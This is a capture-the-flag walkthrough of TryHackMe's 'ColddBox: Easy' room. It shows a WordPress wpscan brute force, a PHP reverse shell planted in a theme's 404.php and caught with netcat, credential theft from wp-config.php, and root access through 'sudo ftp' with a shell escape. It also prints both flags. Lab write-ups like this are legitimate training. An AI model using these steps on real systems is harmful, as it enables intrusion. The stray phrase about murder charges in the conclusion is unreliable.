In this walk through, we will be going through the ColddBox: Easy room from Tryhackme. This room is rated as Easy on the platform and covers exploitation of WordPress CMS and privilege escalation. We have to capture two flags in order to complete this room. So, let’s get started without any delay.
Table of Contents
Machine Info:
| Title | ColddBox-ColddSecurity |
| IPaddress | 10.10.185.226 |
| Difficulty | Easy |
| Objective | An easy level machine with multiple ways to escalate privileges. |
Enumeration:
- I started off with my regular nmap ritual consisting of two scans – one scan determining 1000 most common ports with service detection and other a full port scan to reveal anything that got missed. Found two ports open – 80 (HTTP) and 4512 (SSH).
sudo nmap -sS -sV 10.10.185.226
sudo nmap -sS -T4 -p- 10.10.185.226
- Opening up with the HTTP server running, we found a blog which is running our good old friend – WordPress.
- Further, fired up gobuster on the machine to reveal some endpoints worth exploring. Found one – /hidden
wh1terose@fsociety:~$ gobuster dir -u http://10.10.185.226/ -w ~/Desktop/Wordlist/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.185.226/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/06/23 21:37:18 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/hidden (Status: 301) [Size: 315] [--> http://10.10.185.226/hidden/]
/index.php (Status: 301) [Size: 0] [--> http://10.10.185.226/]
/server-status (Status: 403) [Size: 278]
/wp-admin (Status: 301) [Size: 317] [--> http://10.10.185.226/wp-admin/]
/wp-content (Status: 301) [Size: 319] [--> http://10.10.185.226/wp-content/]
/wp-includes (Status: 301) [Size: 320] [--> http://10.10.185.226/wp-includes/]
/xmlrpc.php (Status: 200) [Size: 42]
===============================================================
2023/06/23 21:38:57 Finished
==============================================================
- Navigating to the hidden directory reveals potential usernames – c0ldd, hugo and Philip and indicates that a password change has been done for hugo.
- Moving on, used wp-scan to enumerate usernames and other useful information on our WordPress blog. Found out 4 users active and a vulnerable theme. I googled up for any known exploits for the theme version or the WordPress core but found nothing useful.
wh1terose@fsociety:~$ wpscan --url http://10.10.185.226 -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.185.226/ [10.10.185.226]
[+] Started: Fri Jun 23 21:45:40 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.185.226/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.185.226/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.185.226/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.185.226/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
| - http://10.10.185.226/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
[+] WordPress theme in use: twentyfifteen
| Location: http://10.10.185.226/wp-content/themes/twentyfifteen/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://10.10.185.226/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 3.4
| Style URL: http://10.10.185.226/wp-content/themes/twentyfifteen/style.css?ver=4.1.31
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.185.226/wp-content/themes/twentyfifteen/style.css?ver=4.1.31, Match: 'Version: 1.0'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <========================================================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] the cold in person
| Found By: Rss Generator (Passive Detection)
[+] hugo
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] philip
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] c0ldd
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Jun 23 21:45:46 2023
[+] Requests Done: 29
[+] Cached Requests: 36
[+] Data Sent: 7.366 KB
[+] Data Received: 45.141 KB
[+] Memory used: 170.094 MB
[+] Elapsed time: 00:00:06
- Next i used the last resort – the bruteforce. Used wp-scan to bruteforce the password of one of the users. Please note on this one as it might take some time. so be patient and let it run. In the attempts, you can see a success. With that success in mind, let’s move ahead with our exploitation phase.
wh1terose@fsociety:~$ wpscan --url http://10.10.185.226 --password-attack wp-login -P ~/Desktop/Wordlist/rockyou.txt -t 50
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.185.226/ [10.10.185.226]
[+] Started: Fri Jun 23 22:28:19 2023
-- snipped --
[+] Performing password attack on Wp Login against 4 user/s
Trying the cold in person / 1234567 Time: 00:00:07 <> (1 / 60000) 0.00%
Trying the cold in person / 123456789 Time: 00:00:07 <> (2 / 60000) 0.00% ETA: 6Trying the cold in person / iloveyou Time: 00:00:08 <> (6 / (2488 / 60000) 4.14% ETA:
-- snipped --
0Trying the cold in person / 5.00% ETA: Trying the ETA: 0[SUCCESS] - c0ldd / 9876543210
-- snipped --
!] Valid Combinations Found:
| Username: c0ldd, Password: 9876543210
Trending
Initial Access:
- Log into the WordPress dashboard using the found credentials.
- Next we will be exploit the theme customizer functionality of the wordpress where we will replace the code from 404.php file to our PHP reverse shell.
- To execute the shell, navigate to the following url as it will give a 404 error executing our code in the background. Set up the netcat listener before navigating on the URL and you will be greeted with a prompt. Next, i tried to read to the user flag however unable to as we only have the privileges of the web service but need the access of user – c0ldd.
Link: http://10.10.185.226/?p=1000
wh1terose@fsociety:~$ nc -lvnp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.185.226 47576
Linux ColddBox-Easy 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
19:40:54 up 1:39, 0 users, load average: 0.00, 0.89, 9.88
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ColddBox-Easy:/$ cd /home
cd /home
www-data@ColddBox-Easy:/home$ ls -l
ls -l
total 4
drwxr-xr-x 3 c0ldd c0ldd 4096 Oct 19 2020 c0ldd
www-data@ColddBox-Easy:/home$ cd c0ldd
cd c0ldd
www-data@ColddBox-Easy:/home/c0ldd$ ls -l
ls -l
total 4
-rw-rw---- 1 c0ldd c0ldd 53 Sep 24 2020 user.txt
www-data@ColddBox-Easy:/home/c0ldd$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@ColddBox-Easy:/home/c0ldd$ 
- Browsing around the file system reveals the wp-config.php file which is a gold mine to get the credentials and exactly that only happened. I found the credentials for user – c0ldd. Changed my privileges using those and got the user flag.
www-data@ColddBox-Easy:/var/www/html$ ls
ls
hidden wp-blog-header.php wp-includes wp-signup.php
index.php wp-comments-post.php wp-links-opml.php wp-trackback.php
license.txt wp-config-sample.php wp-load.php xmlrpc.php
readme.html wp-config.php wp-login.php
wp-activate.php wp-content wp-mail.php
wp-admin wp-cron.php wp-settings.php
www-data@ColddBox-Easy:/var/www/html$ cat wp-config.php
cat wp-config.php
<?php
/**
-- snipped --
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'colddbox');
/** MySQL database username */
define('DB_USER', 'c0ldd');
/** MySQL database password */
define('DB_PASSWORD', 'cybersecurity');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
-- snipped -- 
Privilege Escalation:
- For the privilege escalation stuff, i checked the sudo misconfigurations and found three to choose from for exploitation.
c0ldd@ColddBox-Easy:/var/www/html$ sudo -l
sudo -l
[sudo] password for c0ldd: cybersecurity
Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
(root) /usr/bin/vim
(root) /bin/chmod
(root) /usr/bin/ftp
- Used GTFObins to exploit the ftp binary to root the machine and claim that root flag.
c0ldd@ColddBox-Easy:/var/www/html$ sudo ftp
sudo ftp
ftp> !/bin/sh
!/bin/sh
# id
id
uid=0(root) gid=0(root) grupos=0(root)
# python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@ColddBox-Easy:/var/www/html# cd /root
cd /root
root@ColddBox-Easy:/root# ls
ls
root.txt
root@ColddBox-Easy:/root# cat root.txt
cat root.txt
wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=
root@ColddBox-Easy:/root#
Task 1 – boot2Root
Question 1 – user.txt
RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==Question 2 – root.txt
wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=
Also Read: Tryhackme – Blog
Conclusion:
So that was “ColddBox: Easy” for you. We started off with a regular nmap scan and found two ports opened – 80 (HTTP) and 4512. Next, enumerated the WordPress installation on port 80. Fired up gobuster on the server and found a hidden directory. Next, i used wp-scan to enumerate users in the WordPress installation and further used the same to bruteforce the password of user Coldd and got the password. Used the password got access to the WordPress dashboard. There changed the contents of 404.php file with our PHP reverse shell. Executed it and got a connection back to our netcat listener. Moving on, we horizontally escalated our privileges by peeking into wp-config.php file and getting creds from there of user coldd. At last, escalated our privileges to root by exploiting sudo misconfiguration of ftp binary and got the root flag and conviction of murder charges of my own family. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.
